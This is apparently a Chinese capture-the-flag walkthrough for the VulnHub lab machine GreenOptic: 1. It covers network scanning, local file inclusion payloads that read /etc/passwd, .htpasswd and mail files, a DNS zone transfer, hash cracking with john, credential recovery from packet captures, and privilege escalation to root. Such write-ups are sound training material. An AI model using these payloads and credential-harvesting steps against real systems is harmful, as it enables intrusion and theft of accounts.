一、准备工作

kali和靶机都选择NAT模式（kali与靶机同网段）

1.靶场环境

下载链接:GreenOptic: 1 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

（1）扫描靶机开放的端口及其服务

nmap -A -sV 192.168.101.123

2.网站的信息收集

（1）靶机开放了80端口,先访问靶机网站看看有什么有用的信息

貌似没有什么信息

（2）靶机开放了10000端口,在浏览器中查看一下是否存在有用的信息

发现可能是dns域名解析的问题访问不到http://192.168.101.123:1000,在/etc/hosts文件添加如下信息

192.168.101.123 websrv01.greenoptic.vm

修改完成后,点击刚才页面提示的那个网站

随即进入到登录界面

暂时不知账号密码，先放一放

（3）dirb扫描网站的登录界面

dirb http://192.168.101.123

浏览器登录http://192.168.101.123/account,发现了一个登录界面

虽然没有账号密码登录，但是发现了url可能存在文件包含

http://192.168.101.123/account/index.php?include=/etc/passwd

如上图所示，创建一个文件将这些用户名收集起来,将筛选出来的用户放到username里面

vim user

cat user | grep /bin/bash

vim username

dnsenum --dnsserver 192.168.101.123 --enum greenoptic.vm

（4）找到了另一个域名，设置hosts后访问。发现需要账号密码

dig @192.168.101.123 greenoptic.vm axfr

在/etc/hosts 添加recoveryplan.greenoptic.vm域名

（5）发现一个加密的密码

在view-source:http://192.168.101.123/account/index.php?include=/var/www/.htpasswd一个密码

staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.

（6）用john进行md5解密

cp password password.dc

john --wordlist=/usr/share/wordlists/rockyou.txt password.dc

（7）成功登录http://recoveryplan.greenoptic.vm/

用刚才获取到用户密码登录http://recoveryplan.greenoptic.vm/

进入到key information， 按照提示利用本地文件包含去读terry-/var/mail/terry和sam-/var/mail/sam的邮件，同时下载dpi.zip。 下载好dpi.zip后解压它

cd /下载

unzip dpi.zip

发现解压时需要密码，提示说以邮件形式发送

查看邮件

view-source:http://192.168.101.123/account/index.php?include=/var/mail/sam

利用HelloSunshine123密码解压得出dpi.pcap文件

（7）wireshark流量分析

使用wireshark对dpi.pcap文件进行流量分析

wireshark

1.选择要分析的文件

2.分析

点击统计里面的conversation

tcp流量是当中最多的，可能存在信息

3.找到一组账号密码

alex:FwejAASD1

利用刚才得到用户密码，ssh远程登录

ssh alex@192.168.101.123

3.获取shell

三、漏洞的发现与利用

1.pspy64s监听进程

（1）下载好pspy64s工具到/var/www/html下面

cd /var/www/html

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

将pspy64s工具下载到靶机上

（2）在kali开启一个Http服务

python -m SimpleHTTPServer

（3）远程用户alex下载pspy64s工具

wget 192.168.101.10:8000/pspy64s

（4）提升pspy64s权限

chmod 777 pspy64s

ls -l

（5）启动pspy64s查看进程，寻找可以利用的漏洞

./pspy64s

2.通过流量包分析

用户alex文件夹下有一个wireshark文件夹，同时还发现alex属于wireshark用户组

ls -all

cat /etc/group|grep wireshark

使用dumpcap抓取本地环回地址包一段时间，下载到本地使用wireshark解析。

dumpcap -w test.pcap -i lo

一段时间后ctrl+c退出

将流量包下载到kali上

在靶机

cp test.pcap /tmp/

在kali

scp alex@192.168.101.123:/tmp/test.pcap ./

wireshark

发现有Auth包，base64解码得到了root用户口令ASfojoj2eozxczzmedlmedASASDKoj3o

拿下flag

cd /root

cat root.txt